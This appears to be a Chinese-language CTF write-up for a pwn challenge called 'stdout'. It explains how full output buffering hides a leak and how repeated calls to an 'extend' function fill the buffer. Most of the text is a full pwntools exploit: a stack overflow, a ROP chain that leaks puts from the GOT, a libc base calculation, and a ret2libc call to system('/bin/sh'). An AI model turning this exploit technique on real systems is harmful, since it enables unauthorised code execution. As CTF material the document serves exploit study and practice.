stdout

这里stdout第三个参数是0，就是标准输出全缓冲，缓冲区被填满才能进行回显

刷新缓冲区有几种办法

能够溢出8字节

一个没什么用的函数

那么只能将缓冲区填满，刚开始想的是用vuln函数不断输入

ret的操作是pop rip，rsp=rsp+8, 指向0x0x7fff153a5588. endbr64指令rsp是不动的，push rbp后rbp变成了原来返回地址的位置,再次调用相同的输入也只是让rbp+8,即每次

for i in range(20):
	payload=b'c'*0x28+p64(vul)
	p.send(payload)
	print(i)

也只是让rbp+8移动

第二次的rbp

只是调用vuln的话时不会回显的。

其实不是理想当然的填充，得调用extend函数填充缓冲区。那么就只能不断调用extend函数把缓冲区填满。

调用extend时第二十次时的栈

exp

from pwn import*
from LibcSearcher import *
#p=remote("node4.buuoj.cn",)
p=process("./pwn")
context.log_level="debug"
elf=ELF('./pwn')
libc=ELF('./libc-2.31.so')
extend=0x401287
vul=0x40125D
pop_rdi=0x4013d3
puts_got=elf.got['puts']
puts=elf.plt['puts']
payload=b'a'*0x58+p64(vul)


p.send(payload)
payload=b'b'*0x28+p64(pop_rdi)+p64(puts_got)+p64(puts)+p64(extend)+p64(vul)
p.send(payload)
for i in range(21):
	payload=b'c'*0x28+p64(extend)+p64(vul)
	p.send(payload)

p.recvuntil('stdout???')
p.recvline()
puts_addr=u64(p.recv(6).ljust(8,b'\x00'))
base=puts_addr-0x10dfc0 #libc.sym['puts']
system=base+libc.sym['system']
binsh=base+next(libc.search(b'bin/sh'))
gdb.attach(p)
pause()
payload=b'b'*0x28+p64(pop_rdi)+p64(binsh)+p64(system)
p.send(payload)
print(hex(libc.sym['puts']))
print('put'+hex(puts_addr))

	
p.interactive()